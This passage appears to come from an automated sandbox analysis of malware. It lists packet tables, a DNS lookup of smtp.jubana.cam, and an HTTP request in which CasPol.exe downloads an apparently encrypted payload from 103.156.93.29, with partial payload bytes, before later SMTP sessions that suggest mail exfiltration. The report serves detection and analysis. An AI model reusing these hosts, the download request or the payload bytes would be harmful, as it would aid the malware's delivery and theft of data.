Oct 5, 2022 09:36:18.263084888 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263122082 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263139009 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263173103 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263207912 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263259888 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263274908 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263328075 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263376951 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263422966 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263468981 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263482094 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263536930 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263580084 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263593912 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263653994 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263659954 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263719082 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263767958 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263814926 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263837099 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263879061 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263890982 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.263947964 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263967037 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264014959 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264044046 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264079094 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264128923 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264169931 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264182091 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264244080 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264245033 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264307976 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264326096 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264374971 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264395952 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264441967 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264492035 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264520884 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264549971 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264575005 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264616966 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264647007 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264678955 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264719963 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264734983 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264791012 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264838934 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264846087 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264899015 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.264904976 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264962912 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.264988899 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265024900 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265079021 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265088081 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265146017 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265196085 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265196085 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265256882 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265263081 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265311956 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265322924 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265379906 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265412092 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265436888 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265489101 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265530109 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265542984 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.265583038 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265655994 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.265737057 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.503741026 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.503832102 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.503895044 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.503928900 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.503969908 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504009962 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504055023 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504064083 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504133940 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504163027 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504210949 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504226923 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504292965 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504297972 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504369974 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504379988 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504446983 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504493952 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504509926 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504545927 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504585028 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504627943 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504650116 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504689932 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504722118 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504781961 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504827023 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504842997 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504873991 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.504921913 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.504942894 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505000114 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505023956 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505078077 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505135059 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505158901 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505207062 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505211115 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505279064 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505285025 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505352974 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505367994 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505429029 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505475044 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505491018 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505527020 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505567074 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505608082 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505633116 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505690098 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505697966 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505764961 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505817890 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505825043 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505863905 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505904913 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.505942106 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.505975962 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506023884 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506041050 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506105900 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506139994 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506174088 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506202936 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506251097 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506267071 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506325960 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506347895 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506402016 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506459951 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506486893 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506530046 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506589890 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506609917 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506668091 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506690025 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506745100 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.506815910 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506896019 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.506979942 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:22.812556028 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:22.812763929 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:37:52.134711981 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:52.297772884 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:52.297945023 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:54.844677925 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:54.845031023 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.007265091 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.007831097 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.009535074 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.174710989 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.175170898 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.342622995 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.343780994 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.508804083 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.509232044 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.710845947 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.722536087 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.722939014 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.885507107 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.886796951 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:55.889091969 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.889187098 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.889202118 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:55.889211893 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:37:56.051968098 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:56.052031994 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:56.190964937 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:37:56.235407114 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:38:06.795648098 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:07.389282942 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:08.560883999 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:10.904270887 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:15.574866056 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:24.901133060 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:38:43.537630081 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:39:31.808327913 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:39:31.972100019 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:39:31.972150087 CEST	587	49842	208.91.199.224	192.168.11.20
Oct 5, 2022 09:39:31.972286940 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:39:31.972346067 CEST	49842	587	192.168.11.20	208.91.199.224
Oct 5, 2022 09:39:32.134876013 CEST	587	49842	208.91.199.224	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2022 09:37:51.806405067 CEST	58151	53	192.168.11.20	1.1.1.1
Oct 5, 2022 09:37:52.126144886 CEST	53	58151	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 5, 2022 09:37:51.806405067 CEST	192.168.11.20	1.1.1.1	0x2446	Standard query (0)	smtp.jubana.cam	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 5, 2022 09:37:52.126144886 CEST	1.1.1.1	192.168.11.20	0x2446	No error (0)	smtp.jubana.cam	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 5, 2022 09:37:52.126144886 CEST	1.1.1.1	192.168.11.20	0x2446	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Oct 5, 2022 09:37:52.126144886 CEST	1.1.1.1	192.168.11.20	0x2446	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Oct 5, 2022 09:37:52.126144886 CEST	1.1.1.1	192.168.11.20	0x2446	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Oct 5, 2022 09:37:52.126144886 CEST	1.1.1.1	192.168.11.20	0x2446	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

103.156.93.29

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49837	103.156.93.29	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Oct 5, 2022 09:36:17.067675114 CEST	134	OUT	GET /GpqoIwsbfqqIcl84.xtp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 103.156.93.29 Cache-Control: no-cache
Oct 5, 2022 09:36:17.306513071 CEST	135	IN	HTTP/1.1 200 OK Date: Wed, 05 Oct 2022 07:36:18 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Last-Modified: Wed, 28 Sep 2022 08:15:43 GMT ETag: "36240-5e9b85df9d67b" Accept-Ranges: bytes Content-Length: 221760 Data Raw: d4 da 5b 58 38 b3 25 9d 73 53 41 5a 26 63 dd 55 99 b3 c9 65 4f af 0f 9b d4 48 2b 3b 1e a3 bc 88 f6 32 6e 83 36 36 d0 5b 72 84 97 24 1c 85 8d ba 7b 1f 91 f1 2b e0 7e d5 d0 bb 36 70 76 f2 ae 37 97 a3 aa 58 47 e8 9f f7 3a fc 07 12 d9 03 31 7e d9 47 24 05 19 14 79 e4 28 ae 59 06 3c 91 fb f7 3e f5 b8 48 0a d6 df 8b c6 26 20 e6 94 5f 5a 2a 17 f7 35 b4 45 16 f7 bb 2a 93 4d a2 a4 22 ee 22 eb 8a 90 2e 05 72 3d 11 d3 63 ac ef b9 a4 b7 b5 9e 61 9b 41 e7 72 cb bc 56 9b 06 8e a0 e8 c7 31 dd 00 3c 77 8c fd d1 2f c3 31 c9 3b a5 db 24 2c e4 44 e5 7f 09 16 d6 25 80 af 4c 42 33 d3 5b 58 40 9e 58 4d c6 00 3b 1f f7 42 98 25 24 64 52 48 50 a5 37 a5 4b 01 28 9e 7e 7a 66 ed 60 89 a4 c6 20 01 af b4 41 73 fd 9c 29 ff dd 41 c9 c6 3e 7e 29 40 39 5f 67 6f f5 6c ee 05 7d 09 6c 84 dc f9 c9 43 26 40 ff 31 a5 67 71 4d 7e a7 69 45 db 47 4f 18 9c df 0b 57 5b 15 8d f9 74 c0 9c e6 20 4c 80 d8 20 76 12 07 49 2a f4 db 13 36 b9 c1 26 e8 91 dc 71 b2 e6 10 86 2f f2 c0 ce 08 98 6f 64 ad f2 7b 14 e9 f7 8d bc 82 61 e5 ce 0d b3 43 78 c9 d3 a2 45 13 90 57 8b 57 ba 18 90 d5 ad 0c 93 e0 b9 85 4d ba 3a 35 2e d1 90 33 c3 68 06 7c 6f e1 b0 d5 4d 17 e2 bd 8b ca 2e ab 85 f4 34 50 47 df b6 80 c8 20 bf 78 87 60 63 91 6c e7 13 3a cd be eb ab 8c 56 e3 bb b2 60 5b 8d 23 d3 6a 54 04 d2 ab 96 a5 10 31 b8 c5 d9 37 29 28 3a 39 dc 5f 30 1b 13 dd 70 29 a7 49 22 83 33 b0 2e 33 23 fc 0a 72 28 58 21 d1 ea b7 fc 51 26 93 16 b9 8c c9 c9 b1 de ec e5 3e e8 95 5f 37 3c d6 9b 25 df ce 76 db 11 49 01 e6 0b 39 62 e1 b3 f3 fa 7b 69 4a 00 86 95 66 c2 12 a6 68 44 98 3f 21 b6 99 1d 83 22 17 a8 25 45 da 8a fc 2a dd e8 c7 7b 3b 97 87 7f d0 70 c9 6d d9 24 a5 e0 fd b1 31 e5 28 2d 78 5f 6b 38 54 c7 95 53 24 7d 01 47 cb 15 01 54 72 4b 69 6e df d3 33 ac 5d b8 d4 e3 ba fd 3b f2 e5 6c 2c e4 23 fa 0c 3f 8f ec 15 d2 11 7e b0 3e 47 03 0b 6d ac 22 2a 60 fc 3f d3 56 7d 83 58 bb e2 d0 f0 9e 7b 25 6c d3 3e 5a 92 c8 48 f6 d6 03 0e 33 67 8b 5a 96 73 8b 97 c0 36 9a 85 6c 61 19 53 d4 6f 40 0e 2b a5 99 12 d0 c8 b9 f6 7e 09 69 54 f6 76 b6 75 83 d6 f9 45 32 68 16 6f 47 70 83 f4 10 c4 c3 a0 55 e4 01 16 90 f8 bf 35 05 86 55 d4 47 4c 4e 80 1c 45 1c d6 77 b2 e4 c6 0a 09 8b fc 2f d3 75 33 72 3c bc 79 6d d1 a5 0c bd e8 06 fb 2a cf 10 44 fc d2 70 67 98 ce 2f 01 f2 bf 45 df 99 6a 2d 11 0f a4 e0 88 46 35 70 e0 1b a8 9f 16 2a 7d e9 49 0f c6 87 d2 48 2f 31 f5 9f 58 c9 cb 13 96 9f db ff 86 7a d2 54 f7 37 2c a2 12 99 dc 46 35 99 59 97 89 56 89 66 28 f0 93 dc a3 51 82 50 f6 f0 81 c6 e8 12 d7 fe 6f b5 4b 69 e1 a5 3b 11 a7 92 73 d0 73 25 39 ed 14 49 dd 1e 0e 3f 87 c4 a5 b4 5c 5a 26 8f f9 d8 c9 47 4c 0b 3a 6c 18 18 5a 7b 52 85 4f 17 c8 ab 17 d4 a3 b9 34 d1 f9 3d 40 ba e9 b3 f5 15 fe 2c f1 58 ff 31 7e 65 28 28 05 19 1e 53 f7 58 ac 59 2a 3c 91 fb f3 3e f5 a9 5e 01 fd c4 8b c1 31 de e7 b8 5d 42 21 17 f0 23 4a 44 3a f5 ac 21 93 4a ba da 23 c2 20 ce 97 01 c3 7b c2 34 dc f6 b4 a0 a3 74 8f c9 ce c7 10 bb 1f 95 1d ac cb 37 f6 37 fb ca ad b2 5e ae 37 a0 13 80 8d bc 4a e3 5f b1 e5 e0 b8 75 1b 82 2b 86 02 d9 1a f7 2d 8f ad 67 a1 31 d0 73 49 10 db 52 65 98 01 38 15 84 34 98 54 14 66 52 60 50 a5 37 a3 ab 01 3b 89 7e 50 76 ed 67 c6 59 c7 0c 0b b7 bf 41 74 eb 62 d6 a6 dc 56 c2 e6 39 66 d7 41 15 5d 4c 6d 9e 8f ec 0d 6e 09 6c 8c f6 ea fd 41 26 6c ff 31 a5 60 75 4d 6f b1 62 6e c0 47 48 cf 61 de 27 57 43 1e 8d fe 62 3e 9f ca 62 de 8b d8 37 6e ec 16 65 28 df d9 28 d5 69 d4 26 e8 93 f4 65 Data Ascii: [X8%sSAZ&cUeOH+;2n66[r${+~6pv7XG:1~G$y(Y<>H& _Z5EM"".r=caArV1<w/1;$,D%LB3[X@XM;B%$dRHP7K(~zf` As)A>~)@9_gol}lC&@1gqM~iEGOW[t L vI6&q/od{aCxEWWM:5.3h\|oM.4PG x`cl:V`[#jT17)(:9_0p)I"3.3#r(X!Q&>_7<%vI9b{iJfhD?!"%E{;pm$1(-x_k8TS$}GTrKin3];l,#?~>Gm"`?V}X{%l>ZH3gZs6laSo@+~iTvuE2hoGpU5UGLNEw/u3r<ymDpg/Ej-F5p}IH/1XzT7,F5YVf(QPoKi;ss%9I?\Z&GL:lZ{RO4=@,X1~e((SXY<>^1]B!#JD:!J# {4t77^7J_u+-g1sIRe84TfR`P7;~PvgYAtbV9fA]LmnlA&l1`uMobnGHa'WCb>b7ne((i&e
Oct 5, 2022 09:36:17.306626081 CEST	136	IN	Data Raw: b2 f6 1a ac 3c c2 c2 ce 20 98 6f 64 a5 56 0e 06 ff ab a6 a7 82 66 72 33 0c cf 44 60 c2 d3 a5 53 ed 91 7b 89 40 b1 18 97 cd 53 0d bf e2 92 27 65 59 34 1d 3b d1 90 39 e9 7b 36 7e 6f a2 b0 d5 4d 1e e2 bd 9a dc 25 80 be f4 33 49 b9 de 9a 88 e0 21 bf Data Ascii: < odVfr3D`S{@S'eY4;9{6~oM%3I!xJylVLaw!_gT1'>%-zXrbmEw!v~[+C~n_>A5a:<9ip>_?+:9:<N?VT\kmOcTk?B9
Oct 5, 2022 09:36:17.306694984 CEST	138	IN	Data Raw: 73 74 50 9d 4e 3f 8b bf e9 d3 a7 9f 23 da f3 ba 57 44 e8 9b df 1b fc 07 18 0e b9 33 7e 67 6f 02 05 19 1e 51 c3 68 ae 53 86 2b 91 fb f3 4d dd b8 48 00 dc d9 9f 38 20 06 e6 94 59 29 03 17 f7 3f db 6f 16 f7 b1 2c 84 22 89 24 22 e4 24 c6 95 2a 20 05 Data Ascii: stPN?#WD3~goQhS+MH8 Y)?o,"$"$* xt;/&^$g?Xw=4'9MB3Zpn276A@RHZ]8of CsK>~#fGPgoD%}@C"h1m~eMiOIY%DUcy`v
Oct 5, 2022 09:36:17.306794882 CEST	139	IN	Data Raw: 47 e8 86 0c 70 86 fa 35 f8 6e 7d 83 4b 65 e2 d0 da 9e 7b 25 6d fb 3e 5a 90 c8 31 f6 c0 8c 0e 39 67 8b 5a 96 71 8b ce c0 74 01 85 66 61 19 53 d4 6f 40 0e 2b 08 34 12 c2 d2 b9 f6 7f 12 59 51 f6 7f b5 5d 82 c3 f9 4f 09 74 3c 0e 43 70 89 8a 09 62 b0 Data Ascii: Gp5n}Ke{%m>Z19gZqtfaSo@+4YQ]Ot<Cpb_#^=UK#AeWFf\s$yg>6 8v$ gmnB?qbeILi^7T0C[$*[)QPEs\Y@>,qr2P(A%'[
Oct 5, 2022 09:36:17.544363976 CEST	140	IN	Data Raw: d3 a2 4f 1f 82 55 f5 41 ba 18 94 fd d7 0c 93 ea 1b 2c 54 92 6f 37 2e d7 32 3a eb 13 06 7c 65 c9 9f d5 4d 11 3c d1 a3 fd 2e ab 8f dc 0c 50 47 d5 68 e0 b6 2e bf 78 83 79 50 c9 6b 99 04 3a cd ba c3 ee 8e 56 e5 93 e5 62 5b ab 4c ab 62 54 0e fa f1 94 Data Ascii: OUA,To7.2:\|eM<.PGh.xyPk:Vb[LbT5:8Y]0;p)a{G~;#^"Y!QxKh7<=+c<9ho{C(fAD?`"EjTpmV(M"_k8S(}GAUrin3;l:
Oct 5, 2022 09:36:17.544440985 CEST	142	IN	Data Raw: 70 42 3e 2d 7f 16 79 e2 ca bf 5c 2e 47 91 fb fd 16 92 ba 48 0c fe f7 8b c6 20 27 ce 01 5f 5a 20 3f 9f 37 b4 43 3e 8b bb 2a 99 65 8c 24 22 e8 25 cd ac 2a 20 0f dd b9 c9 f2 db ac b0 71 94 e6 cb df 77 b9 31 93 bf bd cb 20 88 31 ed c1 82 81 1b ab 20 Data Ascii: pB>-y\.GH '_Z ?7C>e$"% qw1 1 X:G 6f'y>d;3QK\38NG.CMJQpS`"isC)@3wIoj}lG?.1greOiO-gO}ss`0vx*}!"qG/eLT
